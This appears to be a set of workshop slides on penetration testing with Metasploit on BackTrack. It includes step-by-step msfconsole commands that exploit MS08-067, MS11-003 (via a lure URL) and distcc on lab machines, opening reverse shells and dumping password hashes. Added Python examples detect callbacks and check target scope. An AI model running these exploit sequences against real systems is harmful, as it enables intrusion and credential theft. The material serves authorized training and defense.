Whoami
• Just me, myself : http://fl3x.us ; @fl3xu5
• InfoSec Enthusiast & Trainer
• Lecturer & Assistant Manager
• CyberCrime Investigator
Why Pentest ?
• Millions of dollars have been invested in security programs to protect critical infrastructure and prevent data breaches *1)
• Penetration testing is one of the most effective ways to identify weaknesses and deficiencies in these programs *1)
What’s Penetration Testing
• A method to evaluate the security of a computer system / network
• Practice ( attacking ) an IT system the way a ‘hacker’ would
• Find security holes ( weaknesses )
• Bypass security mechanisms
• Compromise an organization’s IT system security
Must have permission from the IT system owner !
Illegal activity puts you in jail
<< back|track overview
• The Most Advanced Linux Security Distribution
• Open Source & always will be
• Developed for Security Professionals
• Real World Pentesting Tools
What’s Metasploit
• Not just a tool, but an entire framework *1)
• An open source platform for writing security tools and exploits *2)
• Easily build attack vectors by combining its exploits, payloads and encoders
• Create and execute more advanced attacks
• Ruby based
Metasploit Terminology
• Exploit : code that allows a pentester to take advantage of a flaw within a system, application, or service *1)
• Payload : code that we want the target system to execute ( a few commands to be executed on the target system ) *1)
• Shellcode : a set of instructions used as a payload when exploitation occurs *1)
• Module : a piece of software that can be used by Metasploit *1)
• Listener : a component that waits for an incoming connection *1)
How does exploitation work ?
( diagram : attacker → exploit + payload → vulnerable server )
1. The attacker sends the exploit + payload to the vulnerable server
2. The exploit runs, then the payload runs
3. Upload / Download data
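Seen from the network, the three steps in the diagram are an inbound connection to the vulnerable service (step 1) followed shortly by the server itself opening a new outbound connection back to the same peer (steps 2 and 3, which is exactly what the reverse_tcp payloads used later in these slides do when they connect to LHOST). The following Python is an added example, not part of the original slides or of Metasploit: it correlates constructed firewall-style connection records and flags a server that accepts a hit on a service port and then calls back to that peer within a short window. The log format, the hosts (taken from the lab list) and the 60-second window are assumptions for the example.

```python
import re
from collections import defaultdict, namedtuple
from datetime import datetime, timedelta

# One connection record: timestamp, firewall verdict, source and destination.
Conn = namedtuple("Conn", "ts action src src_port dst dst_port")

# Constructed sample log in a minimal firewall style (not real lab output):
#   <ISO timestamp> <ALLOW|DENY> <src_ip>:<src_port> -> <dst_ip>:<dst_port>
# 172.16.150.165 is the lab's Windows XP box and 172.16.150.169 the BackTrack
# box from the slides; the callback port 443 mirrors the slides' LPORT 443.
SAMPLE_LOG = """\
2013-05-11T10:00:01 ALLOW 172.16.150.169:51432 -> 172.16.150.165:445
2013-05-11T10:00:03 ALLOW 172.16.150.165:1056 -> 172.16.150.169:443
2013-05-11T10:05:00 ALLOW 172.16.150.170:2033 -> 172.16.150.165:445
2013-05-11T10:30:00 ALLOW 172.16.150.165:1062 -> 172.16.150.170:80
"""

LINE_RE = re.compile(r"^(\S+)\s+(ALLOW|DENY)\s+(\S+):(\d+)\s+->\s+(\S+):(\d+)$")


def parse_log(text):
    """Parse lines of the sample format above; lines that do not match are skipped."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        ts = datetime.fromisoformat(m.group(1))
        events.append(Conn(ts, m.group(2), m.group(3), int(m.group(4)),
                           m.group(5), int(m.group(6))))
    return events


def find_callbacks(events, service_ports=frozenset({445}), window=timedelta(seconds=60)):
    """Flag a server that accepts an inbound connection on a service port and then
    opens a NEW outbound connection back to that same peer within `window`.

    This is the exploit-then-payload sequence of the diagram as the network sees
    it: step 1 is the inbound hit, steps 2-3 are the server calling back.
    """
    inbound = defaultdict(list)  # (server, peer) -> [(timestamp, service_port)]
    alerts = []
    for ev in sorted(events, key=lambda e: e.ts):
        if ev.action != "ALLOW":
            continue
        # Check this connection against earlier inbound hits on the reversed
        # (server, peer) pair before recording it as a possible inbound hit.
        for hit_ts, hit_port in inbound.get((ev.src, ev.dst), []):
            delay = ev.ts - hit_ts
            if timedelta(0) <= delay <= window:
                alerts.append({
                    "server": ev.src,
                    "peer": ev.dst,
                    "service_port": hit_port,
                    "callback_port": ev.dst_port,
                    "delay_seconds": delay.total_seconds(),
                })
                break
        if ev.dst_port in service_ports:
            inbound[(ev.dst, ev.src)].append((ev.ts, ev.dst_port))
    return alerts


if __name__ == "__main__":
    for alert in find_callbacks(parse_log(SAMPLE_LOG)):
        print("possible callback:", alert)
```

On the constructed log only the XP box's connection back to the BackTrack box two seconds after the SMB hit is flagged; the later workstation-to-server SMB session followed 25 minutes afterwards by an unrelated HTTP request stays below the window. For the Ubuntu walkthrough at the end of the deck the same logic applies with `service_ports={3632}` (distcc's default port). Protocols that are legitimately bidirectional between the same two hosts will trip this rule, so in practice the window, the port set and an allowlist of known peers need tuning.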
Traditional Pentest vs Metasploit
Traditional Pentest :
• Public exploit gathering
• Change offsets
• Replace shellcode
Metasploit for Pentest :
• Load Metasploit
• Choose the target OS
• Use exploit
• Set payload
• Execute
Meterpreter
• Used as a payload after a vulnerability is exploited *1)
• Improves post exploitation
Pentest Scenario
• Set network adapter : NAT
• Firewall & Windows update : OFF
• Fresh OS installed
• startx
OS in the Lab
• BackTrack 5 R3
  • IP address : 172.16.150.169
• Windows XP SP2
  • IP address : 172.16.150.165
• Windows 2003 Server
  • IP address : 172.16.150.167
• Windows 7
  • IP address : 172.16.150.170
• Ubuntu Linux 8.04 ( Metasploitable )
  • IP address : 172.16.150.171
Windows XP Exploitation
• msf > search windows/smb
• msf > info exploit/windows/smb/ms08_067_netapi
• msf > use exploit/windows/smb/ms08_067_netapi
• msf exploit(ms08_067_netapi) > show payloads
• msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
• msf exploit(ms08_067_netapi) > show options
• msf exploit(ms08_067_netapi) > set RHOST 172.16.150.165
• msf exploit(ms08_067_netapi) > set LHOST 172.16.150.169
• msf exploit(ms08_067_netapi) > show options
• msf exploit(ms08_067_netapi) > exploit
• meterpreter > background
• msf exploit(ms08_067_netapi) > sessions -l
Windows XP Post Exploitation
• msf exploit(ms08_067_netapi) > sessions -i 1
• meterpreter > getsystem -h
• meterpreter > getuid
• meterpreter > hashdump
Windows 2003 Server Exploitation
• msf > search windows/smb
• msf > info exploit/windows/smb/ms08_067_netapi
• msf > use exploit/windows/smb/ms08_067_netapi
• msf exploit(ms08_067_netapi) > show payloads
• msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
• msf exploit(ms08_067_netapi) > show options
• msf exploit(ms08_067_netapi) > set RHOST 172.16.150.167
• msf exploit(ms08_067_netapi) > set LHOST 172.16.150.169
• msf exploit(ms08_067_netapi) > show options
• msf exploit(ms08_067_netapi) > exploit
• meterpreter > background
• msf exploit(ms08_067_netapi) > sessions -l
Windows 7 Exploitation
• msf > use exploit/windows/browser/ms11_003_ie_css_import
• msf exploit(ms11_003_ie_css_import) > set PAYLOAD windows/meterpreter/reverse_tcp
• msf exploit(ms11_003_ie_css_import) > show options
• msf exploit(ms11_003_ie_css_import) > set SRVHOST 172.16.150.169
• msf exploit(ms11_003_ie_css_import) > set SRVPORT 80
• msf exploit(ms11_003_ie_css_import) > set URIPATH miyabi-hot.avi
• msf exploit(ms11_003_ie_css_import) > set LHOST 172.16.150.169
• msf exploit(ms11_003_ie_css_import) > set LPORT 443
• msf exploit(ms11_003_ie_css_import) > exploit
Just wait until the victim opens the URL http://172.16.150.169:80/miyabi-hot.avi
Ubuntu 8.04 Metasploitable Exploitation
• search distcc
• use exploit/unix/misc/distcc_exec
• show payloads
• set PAYLOAD cmd/unix/reverse
• show options
• set rhost 172.16.150.171
• set lhost 172.16.150.169
• exploit
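Every walkthrough above points RHOST, LHOST or SRVHOST at one of the five lab addresses, and the earlier slide is blunt about why that matters: permission from the system owner is the line between a pentest and a crime. The Python below is an added example, not part of the original slides or of Metasploit: it reads msfconsole `set` lines like the ones in the four walkthroughs and refuses any host-valued option that falls outside the authorized lab list. The `AUTHORIZED_HOSTS` table is built from the "OS in the Lab" slide, the sample transcripts are constructed from the Windows XP walkthrough plus deliberately out-of-scope lines, and the `RHOSTS` option (Metasploit's multi-target form) and the 256-address cap are assumptions for the example.

```python
import ipaddress
import re

# Authorized lab hosts, constructed from the "OS in the Lab" slide.
AUTHORIZED_HOSTS = {
    "172.16.150.169": "BackTrack 5 R3 (attacker box, LHOST/SRVHOST)",
    "172.16.150.165": "Windows XP SP2",
    "172.16.150.167": "Windows 2003 Server",
    "172.16.150.170": "Windows 7",
    "172.16.150.171": "Ubuntu 8.04 (Metasploitable)",
}

# Options that name a host. RHOST/LHOST/SRVHOST appear on the slides;
# RHOSTS is Metasploit's multi-target form, which may hold a CIDR range.
HOST_OPTIONS = {"RHOST", "RHOSTS", "LHOST", "SRVHOST"}
MAX_RANGE = 256  # assumption: never enumerate anything bigger than a /24

# A "set OPTION value" line, with or without the msfconsole prompt in front.
SET_LINE = re.compile(r"^(?:msf[^>]*>\s*)?set\s+(\w+)\s+(\S+)\s*$", re.IGNORECASE)


def parse_set_lines(transcript):
    """Return (OPTION, value) pairs for every 'set' line in an msfconsole transcript."""
    found = []
    for raw in transcript.splitlines():
        line = raw.strip().lstrip("•").strip()  # tolerate slide-style bullets
        m = SET_LINE.match(line)
        if m:
            found.append((m.group(1).upper(), m.group(2)))
    return found


def hosts_named_by(value):
    """Expand a host-valued option into IP literals; ValueError if not an IP/CIDR."""
    if "/" in value:
        net = ipaddress.ip_network(value, strict=False)
        if net.num_addresses > MAX_RANGE:
            raise ValueError("range too large to enumerate: %s" % value)
        return [str(h) for h in net.hosts()]
    return [str(ipaddress.ip_address(value))]


def check_scope(transcript, authorized=AUTHORIZED_HOSTS):
    """Classify each host-valued option as in_scope, out_of_scope, or unparsed.

    unparsed collects hostnames and oversized ranges: they are not accepted,
    and must be reviewed by hand before the module is run.
    """
    result = {"in_scope": [], "out_of_scope": [], "unparsed": []}
    for option, value in parse_set_lines(transcript):
        if option not in HOST_OPTIONS:
            continue
        try:
            hosts = hosts_named_by(value)
        except ValueError:
            result["unparsed"].append((option, value))
            continue
        unauthorized = [h for h in hosts if h not in authorized]
        if unauthorized:
            result["out_of_scope"].append((option, value, unauthorized))
        else:
            result["in_scope"].append((option, value))
    return result


def scope_ok(transcript, authorized=AUTHORIZED_HOSTS):
    """True only when every host-valued option resolves to authorized lab hosts."""
    r = check_scope(transcript, authorized)
    return not r["out_of_scope"] and not r["unparsed"]


# Constructed sample transcripts: the Windows XP walkthrough from the slides,
# then the same session with lines that must be refused.
SAMPLE_XP = """\
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > set RHOST 172.16.150.165
msf exploit(ms08_067_netapi) > set LHOST 172.16.150.169
"""
SAMPLE_BAD = SAMPLE_XP + """\
msf exploit(ms08_067_netapi) > set RHOST 10.0.0.5
msf exploit(ms08_067_netapi) > set RHOSTS 172.16.150.164/30
"""

if __name__ == "__main__":
    for name, text in (("XP walkthrough", SAMPLE_XP), ("with stray targets", SAMPLE_BAD)):
        verdict = "OK" if scope_ok(text) else "REFUSED"
        print(name, "->", verdict, check_scope(text))
```

The CIDR case shows why a subset check matters: `172.16.150.164/30` covers the authorized XP box but also `172.16.150.166`, which is nobody's lab machine, so the whole line is refused rather than partially accepted. Hostnames and ranges above the cap land in `unparsed` instead of being resolved, because a scope gate that silently does DNS lookups or walks a /8 is worse than one that stops and asks.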
Greet & Thanks To
• BackTrack Linux
• Metasploit Team ( HD Moore & rapid7 )
• Offensive Security / Metasploit Unleashed
• David Kennedy
• Georgia Weidman
References
• 1. Metasploit : The Penetration Tester’s Guide : David Kennedy, Jim O’Gorman, Devon Kearns, Mati Aharoni
• 2. http://www.metasploit.com
• 3. http://www.offensive-security.com/metasploit-unleashed/Main_Page
• 4. http://www.pentest-standard.org/index.php/PTES_Technical_Guidelines
Challenge in 45 minutes :)
• Connect your Windows OS to the TP-LINK access point over DHCP
• BackTrack 5 R3 VMware setting :
  • Network adapter : Bridged
• Get 4 pictures by yourself & shut down the targets ( if you can :p )
• Win the indobacktrack polo T-shirt